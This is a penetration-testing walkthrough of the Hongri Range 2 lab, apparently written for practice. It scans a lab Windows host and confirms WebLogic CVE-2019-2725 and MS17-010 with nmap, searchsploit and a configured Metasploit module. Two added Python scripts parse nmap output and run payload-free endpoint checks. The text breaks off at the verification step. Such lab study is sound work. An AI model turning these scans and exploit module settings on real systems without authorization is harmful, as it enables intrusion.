Hongri Range 2 (红日靶场二): From WebLogic CVE-2019-2725 to Domain Controller Compromise, Full Walkthrough
I. Lab information / Notes

II. Information gathering

1. TCP port scan + fingerprinting + OS identification

Tools: rustscan + nmap

nmap is given -Pn, which means "skip host discovery". This avoids the failure mode where discovery fails and fingerprinting therefore never runs, because nmap's default logic is:

    host liveness probe (ICMP ping / TCP ping)
        ↓ no response
        ↓ host treated as down → skipped outright, no port scan

The problem is that many hosts, Windows machines and firewalled servers in particular, block ICMP while their services are up and running normally. nmap wrongly marks the host as down and you scan nothing. Two caveats go with -Pn: on the same Ethernet segment nmap discovers hosts by ARP, which a host firewall cannot block, so the flag mostly matters when a router or NAT sits between scanner and target (here the ttl 63 in the REASON column already hints at a hop, since a Windows stack itself starts at 128); and against a large range it is slow, because every address then gets the full port scan whether or not anything is listening.

Command:

    sudo rustscan -a 192.168.111.80 -r 1-65535 -- -sV -O -Pn -n

rustscan sweeps the whole 1-65535 range quickly and hands only the open ports to nmap, passing everything after -- through, so -sV and -O run against a short port list.

Output (long, so only the key part is shown):

    PORT      STATE SERVICE        REASON          VERSION
    80/tcp    open  http           syn-ack ttl 63  Microsoft IIS httpd 7.5
    135/tcp   open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    139/tcp   open  netbios-ssn    syn-ack ttl 63  Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds   syn-ack ttl 63  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
    1433/tcp  open  ms-sql-s       syn-ack ttl 63  Microsoft SQL Server 2008 R2 10.50.4000; SP2
    3389/tcp  open  ms-wbt-server? syn-ack ttl 63
    7001/tcp  open  http           syn-ack ttl 63  Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
    49152/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    49153/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    49154/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    49176/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    49194/tcp open  msrpc          syn-ack ttl 63  Microsoft Windows RPC
    60966/tcp open  ms-sql-s       syn-ack ttl 63  Microsoft SQL Server 2008 R2 10.50.4000; SP2
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (94%)
    OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1
    OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
    Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 SP1 (88%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (87%)
    No exact OS matches for host (test conditions non-ideal).
    TCP/IP fingerprint:
    SCAN(V=7.98%E=4%D=3/31%OT=80%CT=%CU=%PV=Y%G=N%TM=69CB43AF%P=x86_64-pc-linux-gnu)
    SEQ(SP=106%GCD=1%ISR=109%TI=I%TS=7)
    SEQ(SP=109%GCD=1%ISR=108%TI=I%TS=7)
    OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8ST11%O5=M551NW8ST11%O6=M551ST11)
    WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
    ECN(R=Y%DF=Y%TG=40%W=2000%O=M551NW8NNS%CC=N%Q=)
    T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
    T2(R=N)
    T3(R=N)
    T4(R=N)
    U1(R=N)
    IE(R=N)

    Uptime guess: 0.016 days (since Tue Mar 31 11:23:47 2026)
    TCP Sequence Prediction: Difficulty=265 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

    Read data files from: /usr/share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 2 IP addresses (2 hosts up) scanned in 181.06 seconds
               Raw packets sent: 198 (18.984KB) | Rcvd: 60 (3.064KB)

Two things about the OS section. First, the "could not find at least 1 open and 1 closed port" warning is a side effect of the rustscan pipeline: nmap was only handed the open ports, so it had no closed port for the second half of its fingerprint tests (T2 through IE all show R=N). For a cleaner -O result, rerun nmap on its own with a port list that includes one port known to be closed on the target. Second, TG=40 (a guessed initial TTL of 64) and the ttl 63 on every reply do not match a directly reachable Windows stack, whose initial TTL is 128; something in the path is answering with a 64-based TTL. The OS guess therefore rests on the service banners, which consistently say Windows Server 2008 R2, more than on the TCP/IP fingerprint.

2. UDP scan of key ports + fingerprinting

Add a round of UDP scanning so that nothing important is missed.

Tool: nmap

Command:

    sudo nmap -sU --top-ports 20 -sV -Pn -n 192.168.111.80

Output:

    Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 11:51 +0800
    Nmap scan report for 192.168.111.80
    Host is up.

    PORT      STATE         SERVICE      VERSION
    53/udp    open|filtered domain
    67/udp    open|filtered dhcps
    68/udp    open|filtered dhcpc
    69/udp    open|filtered tftp
    123/udp   open|filtered ntp
    135/udp   open|filtered msrpc
    137/udp   open|filtered netbios-ns
    138/udp   open|filtered netbios-dgm
    139/udp   open|filtered netbios-ssn
    161/udp   open|filtered snmp
    162/udp   open|filtered snmptrap
    445/udp   open|filtered microsoft-ds
    500/udp   open|filtered isakmp
    514/udp   open|filtered syslog
    520/udp   open|filtered route
    631/udp   open|filtered ipp
    1434/udp  open|filtered ms-sql-m
    1900/udp  open|filtered upnp
    4500/udp  open|filtered nat-t-ike
    49152/udp open|filtered unknown

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 128.47 seconds

All twenty ports came back open|filtered, which is nmap's way of saying nothing answered at all: a UDP port is only reported open when the service replies to a probe and only closed when an ICMP port-unreachable comes back, and -sV got no replies to work with either. A firewall that drops both leaves this scan with zero information, so do not read the list above as twenty open services. If SNMP (161) or the SQL Server Browser (1434) matter, probe them directly with their NSE scripts, e.g. sudo nmap -sU -p 161,1434 --script snmp-info,ms-sql-info -Pn -n 192.168.111.80, and treat silence as unknown rather than open.

3. Priority list

The target is very likely Windows Server 2008 R2, and since 2008 R2 has no 32-bit edition, x64 is the safe assumption for the architecture if that guess holds.

Port focus:

    PORT     STATE SERVICE REASON          VERSION
    7001/tcp open  http    syn-ack ttl 63  Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)

T3 is WebLogic's remote-object protocol; it is on by default and has a long history of deserialization bugs. Note, though, that CVE-2019-2725 itself is reached over HTTP on this same port (a SOAP request to the _async / wls-wsat web services), so disabling T3 alone would not close it.

    PORT    STATE SERVICE      REASON          VERSION
    445/tcp open  microsoft-ds syn-ack ttl 63  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

MS17-010 (EternalBlue): present on 2008 R2 out of the box until the patch is applied.

III. Vulnerability lookup and verification

1. CVE-2019-2725

Search for vulnerabilities that match the fingerprint. Note that piling on keyword constraints is not always better; loosening the keywords sometimes surfaces richer results.

Check the CVE ID (searchsploit -x opens the exploit file, and its header carries the metadata):

    zyf@kali:~$ searchsploit -x 46780 | head -10
      Exploit: Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
          URL: https://www.exploit-db.com/exploits/46780
         Path: /usr/share/exploitdb/exploits/windows/webapps/46780.py
        Codes: CVE-2019-2725
     Verified: False
    File Type: Python script, ASCII text executable, with very long lines (6251)
    #!/usr/bin/python
    # Exploit Title: Oracle Weblogic Exploit CVE-2019-2725

So it is CVE-2019-2725. Open MSF and locate the module with search:

    msfconsole
    msf > search CVE-2019-2725

    Matching Modules

       #  Name                                                          Disclosure Date  Rank       Check  Description
       -  ----                                                          ---------------  ----       -----  -----------
       0  exploit/multi/misc/weblogic_deserialize_asyncresponseservice  2019-04-23       excellent  Yes    Oracle Weblogic Server Deserialization RCE - AsyncResponseService
       1    \_ target: Unix                                             .                .          .      .
       2    \_ target: Windows                                          .                .          .      .
       3    \_ target: Solaris                                          .                .          .      .

    Interact with a module by name or index.
    For example info 3, use 3 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
    After interacting with a module you can manually set a TARGET with set TARGET Solaris

Use the module and verify:

    msf > use 0
    [*] Using configured payload cmd/unix/reverse_bash
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > info

           Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService
         Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice
       Platform: Unix, Windows, Solaris
           Arch: cmd, x64, x86
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2019-04-23

    Provided by:
      Andres Rodriguez - 2Secure (acamro) <acamro@gmail.com>

    Module side effects:
      ioc-in-logs

    Module stability:
      crash-safe

    Module reliability:
      repeatable-session

    Available targets:
      Id  Name
      --  ----
      0   Unix
      1   Windows
      2   Solaris

    Check supported:
      Yes

    Basic options:
      Name       Current Setting               Required  Description
      ----       ---------------               --------  -----------
      Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sap ni, socks4
      RHOSTS                                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
      RPORT      7001                          yes       The target port (TCP)
      SSL        false                         no        Negotiate SSL/TLS for outgoing connections
      TARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseService
      VHOST                                    no        HTTP server virtual host

    Payload information:

    Description:
      An unauthenticated attacker with network access to the Oracle Weblogic
      Server T3 interface can send a malicious SOAP request to the interface
      WLS AsyncResponseService to execute code on the vulnerable host.

    References:
      https://nvd.nist.gov/vuln/detail/CVE-2019-2725
      http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999
      https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
      https://twitter.com/F5Labs/status/1120822404568244224

    View the full module info with the info -d command.

Two lines of that output matter beyond the options. "Check supported: Yes" means the module can confirm the bug without running a payload, which is what is used next. "Module side effects: ioc-in-logs" is a reminder that both check and exploit are HTTP requests to TARGETURI, so they land in the WebLogic access log; from the defender's side, POSTs to /_async/AsyncResponseService or /wls-wsat/ from unexpected clients are the thing to hunt for.
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows
    target => Windows
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.111.44
    LHOST => 192.168.111.44
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOST 192.168.111.80
    RHOST => 192.168.111.80
    msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
    [+] 192.168.111.80:7001 - The target is vulnerable.

The vulnerability is confirmed. One thing to verify before moving from check to exploit: the payload selected at use time was cmd/unix/reverse_bash, so after switching the target to Windows, confirm that the current payload is a Windows one (show payloads, then set payload ...), otherwise the shell will never call back. check does not care about the payload, which is why it works as shown.

2. EternalBlue

Verify with Nmap's NSE script:

    ┌──(zyf㉿kali)-[~/hongr2]
    └─$ sudo nmap --script=smb-vuln-ms17-010 192.168.111.80 -p 445 -Pn -n
    Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 15:02 +0800
    Nmap scan report for 192.168.111.80
    Host is up (0.068s latency).

    PORT    STATE SERVICE
    445/tcp open  microsoft-ds

    Host script results:
    | smb-vuln-ms17-010:
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

    Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds

The vulnerability is present. This check is non-intrusive: the script connects to the IPC$ share, issues a transaction against FID 0 and treats a STATUS_INSUFF_SERVER_RESOURCES reply as the unpatched signature, so nothing here risks crashing the host. The EternalBlue exploit itself can crash the target, so with a working WebLogic path available it stays the fallback, not the first move.
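The priority list in II.3 was built by hand from two scans. The script below is an added example for this write-up, not code from the original post or from nmap/rustscan: it parses nmap's XML output (-oX) into the same kind of list, ranks the services the walkthrough cares about, and treats the open|filtered UDP results from II.2 as inconclusive rather than open. SAMPLE_XML is constructed from the port table above (it is not a real capture) and the ranking rules and notes are this example's own rules of thumb.

```python
"""Turn nmap XML (-oX) into the section II.3 priority list.

Added example for this write-up, not part of the original post or of nmap.
SAMPLE_XML is constructed from the port table above; it is not a capture.
The priority rules are this example's own rules of thumb.
"""
import sys
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
 <host>
  <address addr="192.168.111.80" addrtype="ipv4"/>
  <ports>
   <port protocol="tcp" portid="80"><state state="open"/>
     <service name="http" product="Microsoft IIS httpd" version="7.5"/></port>
   <port protocol="tcp" portid="445"><state state="open"/>
     <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds"/></port>
   <port protocol="tcp" portid="1433"><state state="open"/>
     <service name="ms-sql-s" product="Microsoft SQL Server 2008 R2" version="10.50.4000; SP2"/></port>
   <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
   <port protocol="tcp" portid="7001"><state state="open"/>
     <service name="http" product="Oracle WebLogic Server" version="10.3.6.0"
              extrainfo="Servlet 2.5; JSP 2.1; T3 enabled"/></port>
   <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
   <port protocol="udp" portid="1434"><state state="open|filtered"/><service name="ms-sql-m"/></port>
  </ports>
  <os><osmatch name="Microsoft Windows Server 2008 R2 or Windows 7 SP1" accuracy="94"/></os>
 </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per host: addr, os, os_accuracy and a list of port dicts."""
    hosts = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), "?")
        osm = host.find("os/osmatch")   # best match, present only if -O ran
        ports = []
        for port in host.iter("port"):
            svc = port.find("service")  # absent when -sV was not used
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            ports.append({
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": port.find("state").get("state"),
                "service": get("name"), "product": get("product"),
                "version": get("version"), "extrainfo": get("extrainfo"),
            })
        hosts.append({
            "addr": addr,
            "os": osm.get("name") if osm is not None else None,
            "os_accuracy": int(osm.get("accuracy", 0)) if osm is not None else 0,
            "ports": ports,
        })
    return hosts


def classify_port(p):
    """Return (priority, note); lower is looked at first, 99 means inconclusive."""
    if p["state"] != "open":
        # UDP open|filtered = no reply at all; nothing is proven either way.
        return 99, "inconclusive (%s): no response, probe directly or drop" % p["state"]
    text = " ".join((p["service"], p["product"], p["extrainfo"])).lower()
    if "weblogic" in text:
        note = "WebLogic %s: CVE-2019-2725 over HTTP (_async, wls-wsat)" % p["version"]
        if "t3 enabled" in text:
            note += "; T3 exposed, deserialization history"
        return 0, note
    if p["service"] == "microsoft-ds":
        return 1, "SMB: run smb-vuln-ms17-010"
    if p["service"] == "ms-sql-s":
        return 2, "MSSQL %s: credential attacks" % p["version"]
    if p["service"] == "ms-wbt-server":
        return 3, "RDP: reuse any credentials found"
    return 9, "enumerate"


def build_priority_list(hosts):
    """Flatten all hosts' ports and sort: priority first, then port number."""
    rows = []
    for h in hosts:
        for p in h["ports"]:
            prio, note = classify_port(p)
            rows.append({"priority": prio, "addr": h["addr"], "proto": p["proto"],
                         "port": p["port"], "state": p["state"], "note": note})
    rows.sort(key=lambda r: (r["priority"], r["port"]))
    return rows


if __name__ == "__main__":
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    hosts = parse_nmap_xml(xml_text)
    for h in hosts:
        print(f"{h['addr']}  OS guess: {h['os']} ({h['os_accuracy']}%)")
    for r in build_priority_list(hosts):
        print(f"  [{r['priority']:2d}] {r['port']:>5}/{r['proto']} {r['state']:<13} {r['note']}")
```

Run both scans with -oX and pass the file as the first argument; without an argument the constructed sample is used. Keeping the inconclusive UDP rows at the bottom with a 99 instead of dropping them makes the "no information" outcome visible in the report instead of silently disappearing.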
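Before firing the Metasploit module in III.1 against port 7001, a practitioner usually wants two cheap, payload-free checks. The script below is an added example, not code from the original post, from Oracle or from the Metasploit module. Check 1 sends a T3 client hello of the same kind nmap's weblogic-t3-info script uses and reads the server version out of the HELO banner (the exact hello string here is this example's). Check 2 sends plain GETs to the two web services that carry CVE-2019-2725, /_async/AsyncResponseService and /wls-wsat/CoordinatorPortType; Oracle's mitigation advice removes the wls9_async_response.war and wls-wsat.war behind them, so a 404 on both means the vulnerable components are gone. The mapping from HTTP status to verdict is this example's assumption (a 200 is taken to mean the component is deployed), and the sample banner and status codes in the test are constructed, not captured.

```python
"""Low-impact pre-checks for CVE-2019-2725 on a WebLogic listen port.

Added example for this write-up; not code from the original post, from
Oracle or from the Metasploit module. Sends no exploit payload.
"""
import http.client
import re
import socket
import sys

# T3 client hello (this example's string, same shape as nmap's weblogic-t3-info);
# a port with T3 enabled answers "HELO:<version>.<true|false>".
T3_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"

# Web services that carry the bug. Oracle's mitigation deletes the two wars
# behind them (wls9_async_response.war, wls-wsat.war), so 404 on both means
# the vulnerable components are gone. Patch status cannot be read this way.
ENDPOINTS = ("/_async/AsyncResponseService", "/wls-wsat/CoordinatorPortType")

# Release lines named as affected in Oracle's CVE-2019-2725 alert (the
# searchsploit hit in the write-up lists the same two).
AFFECTED_PREFIXES = ("10.3.6.0", "12.1.3.0")


def parse_t3_helo(data: bytes):
    """Pull the version out of a T3 HELO banner; None if the reply is not one."""
    m = re.match(rb"HELO:(\d+(?:\.\d+)+)\.(?:true|false)", data)
    return m.group(1).decode() if m else None


def version_in_affected_line(version):
    """True when the reported version sits in an affected release line.
    A match means 'could be affected': applying the patch does not change it."""
    return version is not None and version.startswith(AFFECTED_PREFIXES)


def classify_endpoint_status(statuses):
    """Map {path: HTTP status or None} to a verdict (assumption of this example):
    any 200 -> 'exposed'; all 404 -> 'removed'; only 403/404 -> 'restricted'
    (URL access control applied instead of removal); otherwise 'unknown'."""
    seen = [s for s in statuses.values() if s is not None]
    if not seen:
        return "unknown"
    if 200 in seen:
        return "exposed"
    if all(s == 404 for s in seen):
        return "removed"
    if all(s in (403, 404) for s in seen):
        return "restricted"
    return "unknown"


def t3_version(host, port=7001, timeout=5):
    """Network half of check 1: send the hello, parse the banner."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(T3_HELLO)
        return parse_t3_helo(s.recv(1024))


def endpoint_statuses(host, port=7001, timeout=5):
    """Network half of check 2: plain GETs, no body, no SOAP."""
    out = {}
    for path in ENDPOINTS:
        try:
            conn = http.client.HTTPConnection(host, port, timeout=timeout)
            conn.request("GET", path)
            out[path] = conn.getresponse().status
            conn.close()
        except (OSError, http.client.HTTPException):
            out[path] = None
    return out


def main(argv):
    host = argv[1] if len(argv) > 1 else "192.168.111.80"   # lab target from the write-up
    port = int(argv[2]) if len(argv) > 2 else 7001
    try:
        ver = t3_version(host, port)
    except OSError:
        ver = None
    print("T3 version:", ver, "(affected release line)" if version_in_affected_line(ver) else "")
    statuses = endpoint_statuses(host, port)
    for path, code in statuses.items():
        print(f"{path}: {code}")
    print("verdict:", classify_endpoint_status(statuses))


if __name__ == "__main__":
    main(sys.argv)
```

A version in an affected line plus an "exposed" verdict is the combination that justifies running the module's check; "removed" means Oracle's mitigation was applied and the MSF module has nothing to hit, and "restricted" means the endpoints still exist behind an access rule, which is worth recording but is not the same as patched.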
